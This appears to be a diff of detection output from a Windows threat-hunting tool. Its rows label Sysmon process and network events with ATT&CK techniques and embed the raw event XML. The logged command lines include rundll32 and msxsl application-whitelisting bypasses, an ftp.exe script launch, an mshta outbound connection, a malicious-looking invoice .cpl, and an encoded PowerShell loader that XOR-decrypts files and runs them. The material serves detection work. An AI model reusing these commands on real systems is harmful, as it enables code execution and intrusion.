+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname ( aka105.inwitelecom.net ) , IP ( 105.73.6.105 ) and port ( 80 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>3</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>3</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-21T15:33:01.141798Z"">
+    </TimeCreated>
+    <EventRecordID>4132</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3416"" ThreadID=""3628"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-21 06:58:40.721</Data>
+    <Data Name=""ProcessGuid"">365ABB72-1A29-5CE4-0000-001079F92101</Data>
+    <Data Name=""ProcessId"">2432</Data>
+    <Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""Protocol"">tcp</Data>
+    <Data Name=""Initiated"">true</Data>
+    <Data Name=""SourceIsIpv6"">false</Data>
+    <Data Name=""SourceIp"">10.0.2.15</Data>
+    <Data Name=""SourceHostname"">IEWIN7..home</Data>
+    <Data Name=""SourcePort"">49705</Data>
+    <Data Name=""SourcePortName""></Data>
+    <Data Name=""DestinationIsIpv6"">false</Data>
+    <Data Name=""DestinationIp"">105.73.6.105</Data>
+    <Data Name=""DestinationHostname"">aka105.inwitelecom.net</Data>
+    <Data Name=""DestinationPort"">80</Data>
+    <Data Name=""DestinationPortName"">http</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-23T17:26:09.437896Z"">
+    </TimeCreated>
+    <EventRecordID>1019</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""2092"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-23 17:26:09.417</Data>
+    <Data Name=""ProcessGuid"">365ABB72-D7B1-5CE6-0000-00102CD76D00</Data>
+    <Data Name=""ProcessId"">2240</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">D:\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-CE6C-5CE6-0000-002047F30000</Data>
+    <Data Name=""LogonId"">0xf347</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-D7B0-5CE6-0000-001077C56D00</Data>
+    <Data Name=""ParentProcessId"">3388</Data>
+    <Data Name=""ParentImage"">\\vboxsrv\HTools\msxsl.exe</Data>
+    <Data Name=""ParentCommandLine"">msxsl.exe  c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1557668164.122498,2019-05-12T17:36:04.122498+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe  url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T13:33:59.743077Z"">
+    </TimeCreated>
+    <EventRecordID>16392</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""1996"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 13:33:59.727</Data>
+    <Data Name=""ProcessGuid"">365ABB72-20C7-5CD8-0000-001021022500</Data>
+    <Data Name=""ProcessId"">1416</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32.exe  url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe</Data>
+    <Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
+    <Data Name=""LogonId"">0x13a10</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
+    <Data Name=""ParentProcessId"">2936</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668164.122498,2019-05-12T17:36:04.122498+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe  url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T13:33:59.743077Z"">
+    </TimeCreated>
+    <EventRecordID>16392</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""1996"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 13:33:59.727</Data>
+    <Data Name=""ProcessGuid"">365ABB72-20C7-5CD8-0000-001021022500</Data>
+    <Data Name=""ProcessId"">1416</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32.exe  url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe</Data>
+    <Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
+    <Data Name=""LogonId"">0x13a10</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
+    <Data Name=""ParentProcessId"">2936</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1557668164.122498,2019-05-12T17:36:04.122498+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe  url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T13:33:59.743077Z"">
+    </TimeCreated>
+    <EventRecordID>16392</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""1996"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 13:33:59.727</Data>
+    <Data Name=""ProcessGuid"">365ABB72-20C7-5CD8-0000-001021022500</Data>
+    <Data Name=""ProcessId"">1416</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32.exe  url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe</Data>
+    <Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
+    <Data Name=""LogonId"">0x13a10</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
+    <Data Name=""ParentProcessId"">2936</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1557681649.458113,2019-05-12T21:20:49.458113+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T17:20:49.443464Z"">
+    </TimeCreated>
+    <EventRecordID>16513</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2012"" ThreadID=""300"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 17:20:49.261</Data>
+    <Data Name=""ProcessGuid"">365ABB72-55F1-5CD8-0000-0010781C3300</Data>
+    <Data Name=""ProcessId"">2392</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-4FB5-5CD8-0000-0020F2350100</Data>
+    <Data Name=""LogonId"">0x135f2</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-55F1-5CD8-0000-00108A153300</Data>
+    <Data Name=""ParentProcessId"">3668</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\ftp.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\ftp.exe&quot; -s:c:\users\ieuser\appdata\local\temp\ftp.txt</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920559.063277,2019-05-27T05:29:19.063277+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir /text:userName ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:19.063277Z"">
+    </TimeCreated>
+    <EventRecordID>5946</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:19.023</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-0010A6B1FF00</Data>
+    <Data Name=""ProcessId"">1508</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir /text:userName</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1564434679.45431,2019-07-30T01:11:19.454310+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( &quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:11:17.621241Z"">
+    </TimeCreated>
+    <EventRecordID>4864</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:11:17.503</Data>
+    <Data Name=""ProcessGuid"">747F3D96-60F5-5D3F-0000-0010A8D75500</Data>
+    <Data Name=""ProcessId"">4884</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-0020B5314100</Data>
+    <Data Name=""LogonId"">0x4131b5</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-60F5-5D3F-0000-0010D1CF5500</Data>
+    <Data Name=""ParentProcessId"">4356</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; Shell32.dll,Control_RunDLL &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
